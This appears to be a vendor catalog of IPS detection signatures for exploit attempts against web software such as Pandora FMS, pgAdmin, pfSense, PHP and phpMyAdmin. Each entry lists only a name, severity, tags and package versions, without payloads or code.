Tags: Unix, Linux, Any Hardware, Pandora FMS, CVE2024, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1824-5242
Last changed: sgpkg-ips-1824-5242
Vulnerability: Pandora-FMS-Authenticated-Command-Injection-CVE-2024-11320
Description:
Back to top

HTTP_CRL-Pandora-FMS-chromium_path-Or-phantomjs_bin-RCE-CVE-2024-12971

About this situation: An attempt to exploit a vulnerability in Pandora FMS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Linux, Any Hardware, Pandora FMS, CVE2024, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1866-5242
Last changed: sgpkg-ips-1866-5242
Vulnerability: Pandora-FMS-chromium_path-Or-phantomjs_bin-RCE-CVE-2024-12971
Description:
Back to top

HTTP_CRL-Pandora-FMS-Events-RCE

About this situation: An attempt to exploit a vulnerability in Pandora FMS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Pandora FMS, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1280-5242
Last changed: sgpkg-ips-1435-5242
Vulnerability: Pandora-FMS-Events-RCE
Description:
Back to top

HTTP_CRL-Pandora-FMS-Ping-Authenticated-RCE

About this situation: An attempt to exploit a vulnerability in Pandora FMS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Linux, Any Hardware, Pandora FMS, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1297-5242
Last changed: sgpkg-ips-1297-5242
Vulnerability: Pandora-FMS-Ping-Authenticated-RCE
Description:
Back to top

HTTP_CRL-Panews-MySQL-Prefix-SQL-Injection

About this situation: SQL injection uvlnerability in paNews
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, paNews, CVE2005, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-23-1210
Last changed: sgpkg-ips-507-5211
Vulnerability: HTTP-Panews-MySQL-Prefix-SQL-Injection
Description:
Back to top

HTTP_CRL-Papercut-Improper-Access-Control-Vulnerability-CVE-2023-27350

About this situation: An attempt to exploit a vulnerability in PaperCut MF/NG detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, PaperCut MF/NG, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1581-5242
Last changed: sgpkg-ips-1641-5242
Vulnerability: Papercut-Improper-Access-Control-Vulnerability-CVE-2023-27350
Description:
Back to top

HTTP_CRL-Papercut-Improper-Access-Control-Vulnerability-CVE-2023-27351

About this situation: An attempt to exploit a vulnerability in PaperCut MF/NG detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, PaperCut MF/NG, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1581-5242
Last changed: sgpkg-ips-1639-5242
Vulnerability: Papercut-Improper-Access-Control-Vulnerability-CVE-2023-27351
Description:
Back to top

HTTP_CRL-Papercut-NG-External-User-Lookup-Code-Injection

About this situation: An attempt to exploit a vulnerability in PaperCut PaperCut MF detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, PaperCut MF/NG, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1655-5242
Last changed: sgpkg-ips-1655-5242
Vulnerability: Papercut-NG-External-User-Lookup-Code-Injection
Description:
Back to top

HTTP_CRL-Perl-Null-And-Pipe-In-URI-Arg

About this situation: Potential Poison NULL and Pipe combination seen in argument
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-337-4219
Last changed: sgpkg-ips-337-4219
Description:
Back to top

HTTP_CRL-Perl-Null-In-URI-Arg-1

About this situation: Potential Poison NULL byte seen in argument
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-337-4219
Last changed: sgpkg-ips-337-4219
Description:
Back to top

HTTP_CRL-Perl-Null-In-URI-Arg-2

About this situation: Potential Poison NULL byte seen in argument
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-337-4219
Last changed: sgpkg-ips-337-4219
Description:
Back to top

HTTP_CRL-Perl-Pipe-In-URI-Arg-1

About this situation: A pipe character has been seen in argument to .pl script
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-337-4219
Last changed: sgpkg-ips-337-4219
Description:
Back to top

HTTP_CRL-Perl-Pipe-In-URI-Arg-2

About this situation: A pipe character has been seen in argument to .pl script
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-337-4219
Last changed: sgpkg-ips-337-4219
Description:
Back to top

HTTP_CRL-PerlDesk-kb.cgi-View-Parameter-SQL-Injection

About this situation: An attempt to exploit a vulnerability in PerlDesk detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, PerlDesk, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-684-5211
Last changed: sgpkg-ips-684-5211
Description:
Back to top

HTTP_CRL-Pfsense-Post-Auth-Group-Member-Command-Execution

About this situation: An attempt to exploit a vulnerability in pfSense firewall detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, PfSense, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1029-5242
Last changed: sgpkg-ips-1822-5242
Vulnerability: Pfsense-Post-Auth-Group-Member-Command-Execution
Pfsense-Authenticated-Group-Member-Remote-Command-Execution
Description:
Back to top

HTTP_CRL-Pfsense-Webconfigurator-Firewall_Aliases_Edit-Input-Validation-Error

About this situation: An attempt to exploit a vulnerability in Electric Sheep Fencing pfSense detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: FreeBSD, Any Hardware, PfSense, FreeBSD not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-567-5211
Vulnerability: Pfsense-Webconfigurator-Firewall_Aliases_Edit.php-Input-Validation-Error
Description:
Back to top

HTTP_CRL-Pfsense-Webgui-Zone-Parameter-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in pfSense Project pfSense detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, PfSense, CVE2015, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-665-5211
Last changed: sgpkg-ips-926-5242
Vulnerability: Pfsense-Webgui-Zone-Parameter-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Pgadmin-Authenticated-Remote-Code-Execution-CVE-2023-5002

About this situation: An attempt to exploit a vulnerability in pgAdmin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, pgAdmin, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1837-5242
Last changed: sgpkg-ips-1837-5242
Vulnerability: Pgadmin-Authenticated-Remote-Code-Execution-CVE-2023-5002
Description:
Back to top

HTTP_CRL-Pgadmin-Binary-Path-API-RCE

About this situation: An attempt to exploit a vulnerability in pgAdmin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Linux, Any Hardware, pgAdmin, CVE2024, Windows not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1774-5242
Last changed: sgpkg-ips-1774-5242
Vulnerability: Pgadmin-Binary-Path-API-RCE
Description:
Back to top

HTTP_CRL-Pgadmin-Import-Servers-Directory-Traversal-CVE-2023-0241

About this situation: An attempt to exploit a vulnerability in pgAdmin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, pgAdmin, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1583-5242
Last changed: sgpkg-ips-1754-5242
Vulnerability: Pgadmin-Import-Servers-Directory-Traversal-CVE-2023-0241
Description:
Back to top

HTTP_CRL-Pgadmin-Query-Tool-Authenticated-RCE-CVE-2025-2945

About this situation: An attempt to exploit a vulnerability in pgAdmin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, pgAdmin, CVE2025, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1867-5242
Last changed: sgpkg-ips-1867-5242
Vulnerability: Pgadmin-Query-Tool-Authenticated-RCE-CVE-2025-2945
Description:
Back to top

HTTP_CRL-Pgadmin-Validate_Binary_Path-CVE-2024-3116-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in pgAdmin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, pgAdmin, CVE2024, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1721-5242
Last changed: sgpkg-ips-1721-5242
Vulnerability: Pgadmin-Validate_Binary_Path-CVE-2024-3116-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Pgadmin-Validate_Binary_Path-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in pgAdmin pgAdmin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, pgAdmin, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1544-5242
Last changed: sgpkg-ips-1721-5242
Vulnerability: Pgadmin-Validate_Binary_Path-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Phamm-Helpers.php-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Phamm Phamm detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Phamm, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-970-5242
Last changed: sgpkg-ips-970-5242
Vulnerability: Phamm-Helpers.php-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Phf-Cgi-Command-Execution

About this situation: Attack against vulnerable scripts
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache, NCSA HTTPd, CVE1999, Any Operating System not specific, Apache not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-485-5211
Vulnerability: HTTP-Phf-Cgi-Command-Execution-Vulnerability
Description:
Back to top

HTTP_CRL-Phorum-Register-Php-SQL-Injection

About this situation: Vulnerable register.php accessed
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Phorum, CVE2004, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-513-5211
Vulnerability: HTTP-Phorum-Register-Php-SQL-Injection
Description:
Back to top

HTTP_CRL-Phorum-SQL-read.php3-Attack

About this situation: An attempt to exploit a vulnerability in Phorum 3.0.7 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Phorum, CVE2000, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Vulnerability: Phorum-SQL-read.php3
Description:
Back to top

HTTP_CRL-Php-cfgProgDir-Parameter-File-Inclusion

About this situation: An attempt to download and execute a PHP a file was detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, PHP, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-147-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Php-cfgProgDir-Parameter-File-Inclusion
Description:
Back to top

HTTP_CRL-Php-Core-Unserialize-Key-Name-Use-After-Free

About this situation: An attempt to exploit a vulnerability in PHP core detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, CVE2014, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-714-5211
Vulnerability: Php-Core-Unserialize-Key-Name-Use-After-Free
Php-Core-Unserialize-Process-Nested-Data-Use-After-Free
Description:
Back to top

HTTP_CRL-Php-Crlf-Header-Injection-Proxing-Attack

About this situation: Detects attempts to use a vulnerable PHP script as a proxy
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, CVE2002, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-182-2032
Last changed: sgpkg-ips-1233-5242
Vulnerability: HTTP-Php-Crlf-Fake-Header-Injection
Description:
Back to top

HTTP_CRL-Php-Dateinterval-Heap-Buffer-Overread-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in PHP Group PHP detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, CVE2013, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-1776-5242
Vulnerability: Php-Dateinterval-Heap-Buffer-Overread-Denial-Of-Service
Description:
Back to top

HTTP_CRL-Php-Datetimezone-Object-Timezone-Unserialize-Type-Confusion

About this situation: An attempt to exploit a vulnerability in PHP detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: Php-Datetimezone-Object-Timezone-Unserialize-Type-Confusion
Description:
Back to top

HTTP_CRL-PHP-Fusion-Downloads.php-Command-Injection

About this situation: An attempt to exploit a vulnerability in PHP-Fusion detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, PHP-Fusion, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1298-5242
Last changed: sgpkg-ips-1298-5242
Vulnerability: PHP-Fusion-Downloads.php-Command-Injection
Description:
Back to top

HTTP_CRL-Php-Generic-Shellcode-Encoder-Stub

About this situation: Generic PHP Shellcode Encoder Stub detected
Context: HTTP Normalized Request-Line
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Other Suspicious Traffic, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-573-5211
Last changed: sgpkg-ips-573-5211
Vulnerability: Shellcode-Encoder
Description:
Back to top

HTTP_CRL-Php-Htmlspecialchars-Htmlentities-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in PHP Group PHP detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-443-4219
Last changed: sgpkg-ips-1706-5242
Vulnerability: Php-Htmlspecialchars-Htmlentities-Buffer-Overflow
Description:
Back to top

HTTP_CRL-PHP-IMAP-Open-RCE

About this situation: An attempt to exploit a vulnerability in University of Washington IMAP detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, University of Washington imapd, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1323-5242
Last changed: sgpkg-ips-1323-5242
Vulnerability: PHP-IMAP-Open-RCE
Description:
Back to top

HTTP_CRL-PHP-Phar-404-Page-Reflected-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in PHP Group PHP detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1062-5242
Last changed: sgpkg-ips-1062-5242
Vulnerability: PHP-Phar-404-Page-Reflected-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Php-Quot-Print-Encode-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in PHP Group PHP detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, CVE2013, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-538-5211
Last changed: sgpkg-ips-1746-5242
Vulnerability: Php-Quot-Print-Encode-Heap-Buffer-Overflow
Description:
Back to top

HTTP_CRL-Php-Reserved-Server-Variable-In-Request

About this situation: Detected an attempt to use reserver PHP _SERVER variable in URI
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, PHP, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-199-2032
Last changed: sgpkg-ips-1008-5242
Vulnerability: Php-Reserved-Variable-In-Request
Description:
Back to top

HTTP_CRL-Php-Shell-Escape-Functions-Command-Execution

About this situation: Detects command execution attempts via flaw in escapeshellcmd function
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, PHP, CVE2004, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-182-2032
Last changed: sgpkg-ips-665-5211
Vulnerability: HTTP-Php-Escapeshellcmd-Command-Execution
Description:
Back to top

HTTP_CRL-Php-Unserialize-Call-Spl-Arrayobject-And-Splobjectstorage-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in PHP Group PHP detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-604-5211
Last changed: sgpkg-ips-604-5211
Vulnerability: Php-Unserialize-Call-Spl-Arrayobject-And-Splobjectstorage-Memory-Corruption
Description:
Back to top

HTTP_CRL-Php-Xml_Parse_Into_Struct-Heap-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in PHP Group PHP detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, CVE2013, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-534-5211
Last changed: sgpkg-ips-534-5211
Vulnerability: Php-Xml_Parse_Into_Struct-Heap-Memory-Corruption
Description:
Back to top

HTTP_CRL-Phpbb-Viewtopic-Urldecode-System-Compromise

About this situation: PhpBB viewtopic.php arbitrary code execution
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, PhpBB, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-17-1210
Last changed: sgpkg-ips-1862-5242
Vulnerability: HTTP-Phpbb-Viewtopic-Urldecode-System-Compromise
Description:
Back to top

HTTP_CRL-PhpDig-Config-Php-System-Compromise

About this situation: PhpDig arbitrary PHP code execution attempt
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, PhpDig, CVE2004, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-513-5211
Vulnerability: HTTP-PhpDig-Config-Php-System-Compromise
Description:
Back to top

HTTP_CRL-PhpFileManager-Cmd-Parameter-Command-Execution

About this situation: An attempt to exploit a vulnerability in phpFileManager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, phpFileManager, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-670-5211
Last changed: sgpkg-ips-1645-5242
Vulnerability: PhpFileManager-Cmd-Parameter-Command-Execution
Description:
Back to top

HTTP_CRL-phpLDAPadmin-Remote-PHP-Code-Injection

About this situation: An attempt to exploit a phpLDAPadmin Remote PHP Code Injection vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, phpLDAPadmin, CVE2011, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-1014-5242
Vulnerability: phpLDAPadmin-Remote-PHP-Code-Injection
Description:
Back to top

HTTP_CRL-PHPMailer-Mail-Escapeshellarg-Command-Injection

About this situation: An attempt to exploit a vulnerability in PHPMailer detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, PHPMailer, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-859-5242
Last changed: sgpkg-ips-916-5242
Vulnerability: PHPMailer-Mail-Escapeshellarg-Command-Injection
Description:
Back to top

HTTP_CRL-PHPMailer-Mail-Escapeshellarg-Command-Injection-2

About this situation: An attempt to exploit a vulnerability in PHPMailer detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, PHPMailer, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1654-5242
Last changed: sgpkg-ips-1654-5242
Vulnerability: PHPMailer-Mail-Escapeshellarg-Command-Injection
Description:
Back to top

HTTP_CRL-PHPMailer-Mail-Sender-Command-Injection

About this situation: An attempt to exploit a vulnerability in PHPMailer libphp-phpmailer detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, PHPMailer, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-864-5242
Last changed: sgpkg-ips-864-5242
Vulnerability: PHPMailer-Mail-Sender-Command-Injection
Description:
Back to top

HTTP_CRL-PHPMoAdmin-Remote-Code-Execution

About this situation: An attempt to exploit a PHPMoAdmin Remote Code Execution vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, PHPMoAdmin, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-685-5211
Last changed: sgpkg-ips-685-5211
Vulnerability: PHPMoAdmin-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Phpmyadmin-Grab-Globals-Lib-File-Disclosure

About this situation: Detects PHPMyAdmin grab_globals.lib.php exploit
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, phpMyAdmin, Any Operating System not specific, Disclosure, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-44-1210
Last changed: sgpkg-ips-506-5211
Vulnerability: HTTP-Phpmyadmin-Grab-Globals-Lib-File-Disclosure
Description:
Back to top

HTTP_CRL-Phpmyadmin-Index.php-Local-File-Inclusion

About this situation: An attempt to exploit a vulnerability in phpMyAdmin Devel Team phpMyAdmin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, phpMyAdmin, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1088-5242
Last changed: sgpkg-ips-1098-5242
Vulnerability: Phpmyadmin-Index.php-Local-File-Inclusion
Description:
Back to top

HTTP_CRL-Phpmyadmin-Navigation-Tree-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in phpMyAdmin Devel Team phpMyAdmin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, phpMyAdmin, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1123-5242
Last changed: sgpkg-ips-1123-5242
Vulnerability: Phpmyadmin-Navigation-Tree-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Phpmyadmin-Preg_Replace-Function-Code-Injection

About this situation: An attempt to exploit a vulnerability in phpMyAdmin Devel Team phpMyAdmin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, phpMyAdmin, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-523-5211
Last changed: sgpkg-ips-523-5211
Vulnerability: Phpmyadmin-Preg_Replace-Function-Code-Injection
Description:
Back to top

HTTP_CRL-Phpmyadmin-SQL-Goto-Remote-Code-Injection-Compromise

About this situation: An attempt to exploit a vulnerability in phpMyAdmin
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, phpMyAdmin, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-343-4219
Last changed: sgpkg-ips-343-4219
Vulnerability: Phpmyadmin-SQL-Goto-Remote-File-Include-Vulnerability
Description:
Back to top

HTTP_CRL-PHPNews-news.php-SQL-Injection

About this situation: An attempt to exploit a vulnerability in PHPNews detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-684-5211
Last changed: sgpkg-ips-684-5211
Description:
Back to top

HTTP_CRL-phpScheduleIt-PHP-Code-Injection-Vulnerability

About this situation: An attempt to exploit a vulnerability in phpScheduleIt reserve.php detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, phpScheduleIt, CVE2008, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-659-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: phpScheduleIt-PHP-Code-Injection-Vulnerability
Description:
Back to top

HTTP_CRL-PHPWAY-Link-Management-Script-Main-Page-Directory-Remote-File-Inclusion

About this situation: Detected an attempt to exploit a file inclusion vulnerbility in PHPWAY Link Management Script
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, PHPWAY Link Management Script, CVE2008, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-1607-5242
Vulnerability: PHPWAY-Link-Management-Script-Multiple-File-Inclusion-Vulnerabilities
Description:
Back to top

